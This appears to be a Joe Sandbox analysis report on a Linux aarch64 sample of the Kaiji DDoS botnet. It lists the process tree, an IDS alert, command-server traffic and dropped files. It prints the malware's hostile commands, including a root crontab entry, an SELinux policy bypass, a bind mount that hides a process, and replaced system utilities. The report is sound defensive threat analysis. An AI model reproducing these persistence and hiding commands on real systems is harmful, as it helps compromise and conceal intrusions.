Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
linux_aarch64.elf

Overview

General Information

Sample name:linux_aarch64.elf
Analysis ID:1562743
MD5:b64c72dccf36a9775850933de2e1b852
SHA1:9196a018e1ee50a59256a69408b7b82dd41d4a27
SHA256:6acdf01289672bbd8dc5e28d30b8bcf49d4a2e9f4633c8d6379005df3f154dea
Tags:elfuser-abuse_ch
Infos:

Detection

Kaiji
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Kaiji
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1562743
Start date and time:2024-11-25 23:58:50 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 25s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:linux_aarch64.elf
Detection:MAL
Classification:mal80.spre.troj.evad.linELF@0/58@4/0
  • VT rate limit hit for: linux_aarch64.elf
Command:/tmp/linux_aarch64.elf
PID:6274
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • linux_aarch64.elf (PID: 6274, Parent: 6198, MD5: 02e8e39e1b46472a60d128a6da84a2b8) Arguments: /tmp/linux_aarch64.elf
    • linux_aarch64.elf (PID: 6279, Parent: 6274, MD5: 02e8e39e1b46472a60d128a6da84a2b8) Arguments: /tmp/linux_aarch64.elf
      • bash (PID: 6295, Parent: 6279, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32676&
        • bash New Fork (PID: 6300, Parent: 6295)
        • 32676 (PID: 6300, Parent: 1860, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /etc/32676
          • 32676 New Fork (PID: 6304, Parent: 6300)
          • sleep (PID: 6304, Parent: 6300, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
          • 32676 New Fork (PID: 6458, Parent: 6300)
          • 32676 New Fork (PID: 6460, Parent: 6300)
          • sleep (PID: 6460, Parent: 6300, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
          • 32676 New Fork (PID: 6520, Parent: 6300)
          • 32676 New Fork (PID: 6522, Parent: 6300)
          • sleep (PID: 6522, Parent: 6300, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
      • service (PID: 6301, Parent: 6279, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
        • service New Fork (PID: 6303, Parent: 6301)
        • basename (PID: 6303, Parent: 6301, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6305, Parent: 6301)
        • basename (PID: 6305, Parent: 6301, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6306, Parent: 6301)
        • systemctl (PID: 6306, Parent: 6301, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 6307, Parent: 6301)
          • service New Fork (PID: 6308, Parent: 6307)
          • systemctl (PID: 6308, Parent: 6307, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 6309, Parent: 6307)
          • sed (PID: 6309, Parent: 6307, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 6301, Parent: 6279, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
      • bash (PID: 6310, Parent: 6279, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"
        • bash New Fork (PID: 6312, Parent: 6310)
        • systemctl (PID: 6312, Parent: 6310, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • bash New Fork (PID: 6326, Parent: 6310)
        • systemctl (PID: 6326, Parent: 6310, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaoff.service
        • bash New Fork (PID: 6330, Parent: 6310)
        • systemctl (PID: 6330, Parent: 6310, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaoff.service
        • bash New Fork (PID: 6334, Parent: 6310)
        • journalctl (PID: 6334, Parent: 6310, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager
      • bash (PID: 6341, Parent: 6279, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
        • bash New Fork (PID: 6343, Parent: 6341)
        • bash New Fork (PID: 6344, Parent: 6341)
        • bash New Fork (PID: 6345, Parent: 6341)
      • bash (PID: 6346, Parent: 6279, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
      • renice (PID: 6348, Parent: 6279, MD5: 3686c936ed1df483498266a36871cb5b) Arguments: renice -20 6279
      • mount (PID: 6350, Parent: 6279, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/6279
      • service (PID: 6376, Parent: 6279, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start
        • service New Fork (PID: 6378, Parent: 6376)
        • basename (PID: 6378, Parent: 6376, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6379, Parent: 6376)
        • basename (PID: 6379, Parent: 6376, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6380, Parent: 6376)
        • systemctl (PID: 6380, Parent: 6376, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 6396, Parent: 6376)
          • service New Fork (PID: 6397, Parent: 6396)
          • systemctl (PID: 6397, Parent: 6396, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 6398, Parent: 6396)
          • sed (PID: 6398, Parent: 6396, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 6376, Parent: 6279, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service
      • systemctl (PID: 6402, Parent: 6279, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
  • systemd New Fork (PID: 6314, Parent: 6313)
  • snapd-env-generator (PID: 6314, Parent: 6313, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6328, Parent: 6327)
  • snapd-env-generator (PID: 6328, Parent: 6327, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6331, Parent: 1)
  • udisksd New Fork (PID: 6364, Parent: 799)
  • dumpe2fs (PID: 6364, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6401, Parent: 1)
  • cron (PID: 6401, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 6407, Parent: 6401)
      • cron New Fork (PID: 6408, Parent: 6407)
      • sh (PID: 6408, Parent: 6407, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "
        • sh New Fork (PID: 6409, Parent: 6408)
        • .mod (PID: 6409, Parent: 6408, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod
          • .mod New Fork (PID: 6410, Parent: 6409)
  • systemd New Fork (PID: 6417, Parent: 1)
  • cron (PID: 6417, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 6467, Parent: 6417)
      • cron New Fork (PID: 6474, Parent: 6467)
      • sh (PID: 6474, Parent: 6467, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "
        • sh New Fork (PID: 6475, Parent: 6474)
        • .mod (PID: 6475, Parent: 6474, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod
          • .mod New Fork (PID: 6476, Parent: 6475)
  • systemd New Fork (PID: 6496, Parent: 1)
  • cron (PID: 6496, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
KaijiSurfaced in late April 2020, Intezer describes Kaiji as a DDoS malware written in Go that spreads through SSH brute force attacks. Recovered function names are an English representation of Chinese words, hinting about the origin. The name Kaiji was given by MalwareMustDie based on strings found in samples.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji
SourceRuleDescriptionAuthorStrings
linux_aarch64.elfJoeSecurity_Kaiji_1Yara detected KaijiJoe Security
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-26T00:00:00.352448+010020446671A Network Trojan was detected192.168.2.2334026103.135.101.1881930TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: linux_aarch64.elfReversingLabs: Detection: 23%

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2044667 - Severity 1 - ET MALWARE Golang/Linux Kaiji Variant Activity : 192.168.2.23:34026 -> 103.135.101.188:1930
    Source: global trafficTCP traffic: 192.168.2.23:34026 -> 103.135.101.188:1930
    Source: /tmp/linux_aarch64.elf (PID: 6279)Reads hosts file: /etc/hostsJump to behavior
    Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
    Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: wdearas.liveya.org
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal80.spre.troj.evad.linELF@0/58@4/0
    Source: ELF file sectionSubmission: linux_aarch64.elf

    Persistence and Installation Behavior

    barindex
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/profile.d/bash_cfg.shJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/profile.d/gateway.shJump to behavior
    Source: /bin/bash (PID: 6346)File: /etc/crontabJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/32676 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/.walkJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /dev/.walk.lodJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/.walkJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /dev/.oldJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /dev/.imgJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /.modJump to behavior
    Source: /.mod (PID: 6409)Directory: /.modJump to behavior
    Source: /.mod (PID: 6475)Directory: /.modJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)Empty hidden file: /dev/.oldJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)Empty hidden file: /dev/.walk.lodJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)Empty hidden file: /dev/.imgJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/3088/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/230/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/110/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/231/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/111/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/232/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1579/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/112/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/233/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1699/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/113/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/234/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1335/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1698/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/114/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/235/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1334/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1576/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/2302/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/115/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/236/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/116/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/237/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/117/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/118/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/910/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/119/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/912/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/6229/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/6107/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/10/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/2307/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/11/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/918/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/12/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/13/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/14/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/15/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/16/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/17/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/18/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1594/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/120/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/121/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1349/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/122/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/243/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/123/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/2/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/124/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/3/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/4/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/125/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/126/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1344/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1465/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1586/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/127/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/6/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/248/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/128/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/249/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1463/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/800/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/9/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/801/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/5822/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/20/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/21/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1900/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/22/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/23/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/24/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/25/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/26/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/27/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/28/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/6258/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/29/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/6257/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/491/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/250/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/130/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/251/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/252/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/132/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/253/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/254/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/4508/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/255/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/256/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1599/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/257/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1477/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/379/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/258/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1476/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/259/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/1475/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/936/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/30/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/2208/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File opened: /proc/35/statJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6295)Shell command executed: /bin/bash -c /etc/32676&Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6310)Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6341)Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6346)Shell command executed: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"Jump to behavior
    Source: /usr/sbin/cron (PID: 6408)Shell command executed: /bin/sh -c "/.mod "Jump to behavior
    Source: /usr/sbin/cron (PID: 6474)Shell command executed: /bin/sh -c "/.mod "Jump to behavior
    Source: /usr/sbin/service (PID: 6301)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
    Source: /usr/sbin/service (PID: 6306)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
    Source: /usr/sbin/service (PID: 6308)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
    Source: /bin/bash (PID: 6312)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
    Source: /bin/bash (PID: 6326)Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaoff.serviceJump to behavior
    Source: /bin/bash (PID: 6330)Systemctl executable: /usr/bin/systemctl -> systemctl start quotaoff.serviceJump to behavior
    Source: /usr/sbin/service (PID: 6376)Systemctl executable: /usr/bin/systemctl -> systemctl start cron.serviceJump to behavior
    Source: /usr/sbin/service (PID: 6380)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
    Source: /usr/sbin/service (PID: 6397)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6402)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/opt.services.cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/32676 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /boot/System.mod (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /etc/profile.d/bash_cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/lib/libgdi.so.0.8.1 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/lib/system-mark (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/include/ps (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/include/ss (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/include/ls (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/include/dir (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/include/netstat (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/include/find (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/include/lsof (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/ps (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/ss (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/ls (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/dir (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/netstat (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/find (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)File: /usr/bin/lsof (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/32676Jump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /.modJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/acpidJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utilsJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/anacronJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmorJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/apportJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemonJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-supportJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetoothJump to dropped file
    Source: /tmp/linux_aarch64.elf (PID: 6279)Writes shell script file to disk with an unusual file extension: /etc/init.d/cronJump to dropped file
